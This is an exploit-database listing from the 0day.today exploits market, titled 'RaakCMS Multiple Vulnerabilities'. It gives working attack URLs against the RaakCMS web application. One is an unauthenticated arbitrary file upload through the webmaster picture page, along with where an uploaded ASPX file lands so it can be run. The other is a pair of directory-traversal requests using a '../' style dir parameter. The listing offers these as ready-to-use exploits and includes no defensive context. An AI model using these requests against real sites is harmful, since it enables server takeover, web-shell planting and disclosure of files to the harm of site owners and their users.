[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

RaakCMS Multiple Vulnerabilities

Author
Pouya Daneshmand
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10748
Category
web applications
Date add
01-02-2010
Platform
unsorted
================================
RaakCMS Multiple Vulnerabilities
================================

#################################################################
# Application Info:
# Name: RaakCms
# Vendor: http://raakcms.com
#################################################################
Vulnerability:
=======================
Arbitrary File Upload
=======================
http://server/webmaster/pic.aspx
select file and folder , your file upload here:
http://server/User_Images/[Folder]/FILE.ASPX
 
=======================
Directory Traversal
=======================
http://server/browse.asp?dir=./..
http://server/browseFile.asp?dir=./..
#################################################################



#  0day.today [2024-12-26]  #